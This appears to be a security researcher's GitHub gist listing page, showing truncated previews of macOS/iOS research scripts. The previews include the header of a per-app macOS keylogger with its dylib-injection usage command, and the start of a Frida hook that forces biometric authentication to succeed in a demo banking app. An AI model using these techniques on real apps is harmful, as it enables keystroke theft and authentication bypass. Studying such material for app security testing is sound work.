Wojciech Reguła r3ggi
r3ggi
/ audit_token_by_pid.m
Last active
July 12, 2024 09:11
insecurely (by PID) get audit_token of arbitrary process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // code based on Scott Knight's blog post: https://knight.sc/reverse%20engineering/2019/04/15/detecting-task-modifications.html | |
| // WARNING: this approach is insecure - do not rely on audit_token retrieved from PID!!! | |
| #import <Foundation/Foundation.h> | |
| #include <libproc.h> | |
| #include <mach/mach.h> | |
| audit_token_t auditTokenForPid(pid_t pid) { | |
| task_name_t task; | |
| mach_msg_type_number_t size = TASK_AUDIT_TOKEN_COUNT; |
r3ggi
/ trace-seckeycreateencrypteddata.js
Last active
September 27, 2023 20:09
Trace SecKeyCreateEncryptedData() calls with Frida
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Native ArrayBuffer to Base64 | |
| // https://gist.github.com/jonleighton/958841 | |
| function base64ArrayBuffer(arrayBuffer) { | |
| var base64 = '' | |
| var encodings = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' | |
| var bytes = new Uint8Array(arrayBuffer) | |
| var byteLength = bytes.byteLength | |
| var byteRemainder = byteLength % 3 | |
| var mainLength = byteLength - byteRemainder |
r3ggi
/ macos-keylogger.m
Last active
February 14, 2024 16:11
Universal macOS app keylogger that tracks input locations
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Info: | |
| // Universal macOS keylogger that tracks input locations. It's injected per app as it doesn't require having global keyboard capturing permission | |
| // Compilation: | |
| // gcc -dynamiclib /tmp/keylogger.m -o /tmp/keylogger.dylib -framework Foundation -framework Appkit -arch x86_64 -arch arm64 | |
| // Usage: | |
| // DYLD_INSERT_LIBRARIES=/tmp/keylogger.dylib /path/to/app/Contents/MacOS/App | |
| #import <Foundation/Foundation.h> |
r3ggi
/ flutter-ios-keyboard-cache.js
Created
May 11, 2022 12:04
Flutter keyboard cache verifier - Frida script for iOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Flutter keyboard cache verifier - Frida script for iOS | |
| // Script based on https://codeshare.frida.re/@ay-kay/ios-custom-keyboard-support/ | |
| function resolveAutocorrectionType(typeNr) { | |
| switch (parseInt(typeNr, 10)) { | |
| case 1: | |
| return "UITextAutocorrectionTypeNo" | |
| break; | |
| case 2: | |
| return "UITextAutocorrectionTypeYes" |
r3ggi
/ download_apple_tarballs.sh
Created
January 5, 2021 09:50
— forked from theevilbit/download_apple_tarballs.sh
Download tarballs from https://opensource.apple.com/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l2 https://opensource.apple.com/tarballs | |
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" -l2 https://opensource.apple.com/ | |
| wget --no-check-certificate --recursive --domains=opensource.apple.com --no-clobber --accept "*.gz" --no-parent -l3 https://opensource.apple.com/darwinbuild/ |
r3ggi
/ SecuBank-bypass.js
Created
November 25, 2019 13:45
[Bypassing biometrics article] SecuBank Frida bypass
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if(ObjC.available) { | |
| console.log("Injecting..."); | |
| var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"]; | |
| Interceptor.attach(hook.implementation, { | |
| onEnter: function(args) { | |
| var block = new ObjC.Block(args[4]); | |
| const callback = block.implementation; | |
| block.implementation = function (error, value) { | |
| console.log("Changing the result value to true") |
r3ggi
/ SecuBank-Biometrics.swift
Created
November 25, 2019 13:43
[Bypassing biometrics article] SecuBank verification example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @IBAction func startVerification(_ sender: Any) { | |
| let myContext = LAContext() | |
| let myLocalizedReasonString = "Verifying...." | |
| var authError: NSError? | |
| if myContext.canEvaluatePolicy(.deviceOwnerAuthenticationWithBiometrics, error: &authError) { | |
| myContext.evaluatePolicy(.deviceOwnerAuthenticationWithBiometrics, localizedReason: myLocalizedReasonString) { (success, evaluateError) in | |
| DispatchQueue.main.async { | |
| if success { | |
| self.verificationStatusLabel.text = "✅ Verification successful" |